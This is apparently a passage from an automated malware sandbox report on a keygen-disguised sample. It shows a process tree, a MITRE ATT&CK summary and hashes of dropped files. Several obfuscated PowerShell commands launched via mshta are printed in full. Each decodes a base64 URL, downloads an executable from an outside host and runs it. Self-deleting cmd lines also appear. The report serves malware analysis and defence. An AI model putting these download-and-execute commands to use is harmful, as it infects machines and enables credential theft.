                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:1992
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Blocklisted process makes network request
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1688
                          • C:\Users\Public\zpa.exe
                            "C:\Users\Public\zpa.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2484
                            • C:\Windows\SysWOW64\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                              6⤵
                              • Loads dropped DLL
                              PID:1920
                              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2452
                                • C:\Windows\SysWOW64\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                                  8⤵
                                  • Loads dropped DLL
                                  PID:604
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    9⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of SetThreadContext
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2488
                                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                      10⤵
                                      • Executes dropped EXE
                                      PID:1900
                                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks processor information in registry
                                  PID:2724
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /pid 2724 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\568464876933949\\* & exit
                                    9⤵
                                      PID:1588
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /pid 2724
                                        10⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:812
                              • C:\Users\Public\zpa.exe
                                "C:\Users\Public\zpa.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:2436
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A766.tmp\b1.hta"
                          3⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of WriteProcessMemory
                          PID:584
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1220
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout 2
                          3⤵
                          • Delays execution with timeout.exe
                          PID:576
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A766.tmp\ba.hta"
                          3⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of WriteProcessMemory
                          PID:872
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                            4⤵
                            • Blocklisted process makes network request
                            • Loads dropped DLL
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1428
                            • C:\Users\Public\qsz.exe
                              "C:\Users\Public\qsz.exe"
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of SetWindowsHookEx
                              PID:2564
                              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: MapViewOfSection
                                • Suspicious use of SetWindowsHookEx
                                PID:2664
                                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks processor information in registry
                                  PID:2808
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /pid 2808 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\405975868508936\\* & exit
                                    8⤵
                                      PID:2984
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /pid 2808
                                        9⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:524
                                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: MapViewOfSection
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2692
                                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:2300
                                • C:\Users\Public\qsz.exe
                                  "C:\Users\Public\qsz.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:2800
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A766.tmp\ba1.hta"
                            3⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of WriteProcessMemory
                            PID:360
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:364

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Persistence

                      Modify Existing Service

                      1
                      T1031

                      Registry Run Keys / Startup Folder

                      1
                      T1060

                      Defense Evasion

                      Modify Registry

                      6
                      T1112

                      Disabling Security Tools

                      2
                      T1089

                      Install Root Certificate

                      1
                      T1130

                      Credential Access

                      Credentials in Files

                      3
                      T1081

                      Discovery

                      Query Registry

                      2
                      T1012

                      System Information Discovery

                      2
                      T1082

                      Collection

                      Data from Local System

                      3
                      T1005

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\MSVCP140.dll
                      • C:\ProgramData\VCRUNTIME140.dll
                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\msvcp140.dll
                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\vcruntime140.dll
                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
                        MD5

                        597009ea0430a463753e0f5b1d1a249e

                        SHA1

                        4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

                        SHA256

                        3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

                        SHA512

                        5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4243b4a4-5738-4e81-b2ad-db32e9960e87
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
                        MD5

                        b6d38f250ccc9003dd70efd3b778117f

                        SHA1

                        d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

                        SHA256

                        4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

                        SHA512

                        67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
                        MD5

                        02ff38ac870de39782aeee04d7b48231

                        SHA1

                        0390d39fa216c9b0ecdb38238304e518fb2b5095

                        SHA256

                        fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

                        SHA512

                        24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_578e8233-4000-46fc-abca-7fa3d87dcfe3
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                        MD5

                        a725bb9fafcf91f3c6b7861a2bde6db2

                        SHA1

                        8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

                        SHA256

                        51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

                        SHA512

                        1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                        MD5

                        a725bb9fafcf91f3c6b7861a2bde6db2

                        SHA1

                        8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

                        SHA256

                        51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

                        SHA512

                        1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                        MD5

                        a725bb9fafcf91f3c6b7861a2bde6db2

                        SHA1

                        8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

                        SHA256

                        51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

                        SHA512

                        1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                        MD5

                        a725bb9fafcf91f3c6b7861a2bde6db2

                        SHA1

                        8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

                        SHA256

                        51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

                        SHA512

                        1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                        MD5

                        a725bb9fafcf91f3c6b7861a2bde6db2

                        SHA1

                        8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

                        SHA256

                        51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

                        SHA512

                        1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6c7d9c4b-383e-4923-b32f-40cb4c4e6c69
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
                        MD5

                        df44874327d79bd75e4264cb8dc01811

                        SHA1

                        1396b06debed65ea93c24998d244edebd3c0209d

                        SHA256

                        55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

                        SHA512

                        95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
                        MD5

                        5e3c7184a75d42dda1a83606a45001d8

                        SHA1

                        94ca15637721d88f30eb4b6220b805c5be0360ed

                        SHA256

                        8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

                        SHA512

                        fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
                        MD5

                        75a8da7754349b38d64c87c938545b1b

                        SHA1

                        5c28c257d51f1c1587e29164cc03ea880c21b417

                        SHA256

                        bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

                        SHA512

                        798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
                        MD5

                        be4d72095faf84233ac17b94744f7084

                        SHA1

                        cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

                        SHA256

                        b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

                        SHA512

                        43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f55a5e71-f0c8-4db3-9092-665b34ced429
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        MD5

                        7b72724266aea97be3b94f98804e680d

                        SHA1

                        e1e148dcec690b7c090132e3ecbf43d4012950ff

                        SHA256

                        bbf7e9ef81efe2f5619140928f00e97f0dbc88d97d7cf5a8df5bb8d8d963e205

                        SHA512

                        2b358440e236417a0b2285ab10ef93095e8ee1f5ce6525dbe2a13a5a95b7b7cedae71a26e6ac50b385bc2e5fe4fa5085ccf2ee64dedff0a0b3b93533d87f95c7

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        MD5

                        695c9d0cc8679ae959f7a69edf8b5918

                        SHA1

                        b70b7e6300616c27b35294f586f3e5a3ba980c8d

                        SHA256

                        045fe00bb9204d16493e15c303f8f01b3f29a7517acf8958850c2ae521189ef7

                        SHA512

                        7f1ad9c60b25e379c6c67f050de7c9e2d881cdd010940cea80db0e0602535be64167342d290628a85c0e352f11b83143c9daa4fe03b1fd99125e5ef6ddf6f83f

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        MD5

                        724dbaec7b85e7792c25bf062664ab8e

                        SHA1

                        e4a961693a1df455194d75fa3e558f4fa7ce904d

                        SHA256

                        409bfcd7ad6da92d344af0213e47d7467ea343447d296e26718bc5896679940f

                        SHA512

                        911c4bfd3af7655cd39d21820729fb13d6ed510b86bd26c0d19c6ed9a10d5f96fe525b486e0fbfc965476eb42c62746f40487f1cea4d0b30575ab874cc068378

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        MD5

                        2405d9cef8a515235fd68d859fd4758e

                        SHA1

                        058f04a0e00911a56be986683afd8b07eee1b75e

                        SHA256

                        4a1e1410adeb6857750509b41cbd8f9d5b4fcc1b458b4f2544da9635f49bd238

                        SHA512

                        e0bfc2a2bdaa8ad7df842f5b40872fbfb4fa732b104cd9a74f095eb44b4570c93203ddcfc27232ce9cd87d16745910580bf4d65e980864240c46740b21b7e15f

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        MD5

                        2adf0d5ee0e187c5aa6c3938a49940a1

                        SHA1

                        5b216ee033f351612da054b56ef02cb050cfcd61

                        SHA256

                        9dd8509664412e9757f93c870c860562b8eebf6180c018e3c094a091225d29c8

                        SHA512

                        74e57296d062fb186933ee421bd87e296e784b2e7b998b4009dd2ccbf27ddb1e003f7a248f8eec21b87e84bba909d81dee944e93b06608310eb4fb98fefc95d7

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        MD5

                        2adf0d5ee0e187c5aa6c3938a49940a1

                        SHA1

                        5b216ee033f351612da054b56ef02cb050cfcd61

                        SHA256

                        9dd8509664412e9757f93c870c860562b8eebf6180c018e3c094a091225d29c8

                        SHA512

                        74e57296d062fb186933ee421bd87e296e784b2e7b998b4009dd2ccbf27ddb1e003f7a248f8eec21b87e84bba909d81dee944e93b06608310eb4fb98fefc95d7

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                        MD5

                        5a4049c8913a78bb095fc09ee8ce34ed

                        SHA1

                        386c9f6de61edeb6d1280fbdbb4e5d4e00d509a0

                        SHA256

                        97dbf6df6c43f7d93a2f3ddcdcdb69a8a3de8e8b610b17cd74661f06c78c9970

                        SHA512

                        10d231c58f78b2f83a9a1b01d211959643bebd8a6556e4405eedb12b8bb284238eeb6705c9045c347c12d4065b88e0510ce3436207a21ca751033bc0f6f0f8dc

                      • C:\Users\Admin\AppData\Local\Temp\A766.tmp\Keygen.exe
                      • C:\Users\Admin\AppData\Local\Temp\A766.tmp\Keygen.exe
                        MD5

                        ea2c982c12fbec5f145948b658da1691

                        SHA1

                        d17baf0b8f782934da0c686f2e87f019643be458

                        SHA256

                        eecd6f108f35df83d4450effa5d5640efe7e5f2fff819833f01fb2d053e626d4

                        SHA512

                        1f1d6768467fff8387be1cf536e01cfbf28cb04777fa184f18fcab0c518ead8d52827abe5ca1c566c425616c7b06ab1bce0c92dd684c818b51fc52fa0f4b74b8

                      • C:\Users\Admin\AppData\Local\Temp\A766.tmp\b.hta
                        MD5

                        5bbba448146acc4530b38017be801e2e

                        SHA1

                        8c553a7d3492800b630fc7d65a041ae2d466fb36

                        SHA256

                        96355db8fd29dcb1f30262c3eac056ff91fd8fa28aa331ed2bedd2bd5f0b3170

                        SHA512

                        48e3d605b7c5531cb6406c8ae9d3bd8fbb8f36d7dd7a4cbe0f23fc6ef2df08267ce50d29c7ec86bf861ebdcf9e48fb9c61c218f6584f1a9a0289a10a2fec730b

                      • C:\Users\Admin\AppData\Local\Temp\A766.tmp\b1.hta
                      • C:\Users\Admin\AppData\Local\Temp\A766.tmp\ba.hta
                        MD5

                        b762ca68ba25be53780beb13939870b2

                        SHA1

                        1780ee68efd4e26ce1639c6839c7d969f0137bfd

                        SHA256

                        c15f61a3c6397babdf83b99b45345fec9851c4d3669c95b717f756b7c48050d1

                        SHA512

                        f99570d2dae550cb1474e2d1cabf8296a685e0e7254d92eb21d856acb8dece635a0842a00d63da2a4faa18c52c57244c565d6a752c857d5c15e8c23b3d4a9e1a

                      • C:\Users\Admin\AppData\Local\Temp\A766.tmp\ba1.hta
                      • C:\Users\Admin\AppData\Local\Temp\A766.tmp\m.hta
                        MD5

                        9383fc3f57fa2cea100b103c7fd9ea7c

                        SHA1

                        84ea6c1913752cb744e061ff2a682d9fe4039a37

                        SHA256

                        831e8ee7bc3eeeaaa796a34cbb080658dec1be7eb26eb2671353f650041b220d

                        SHA512

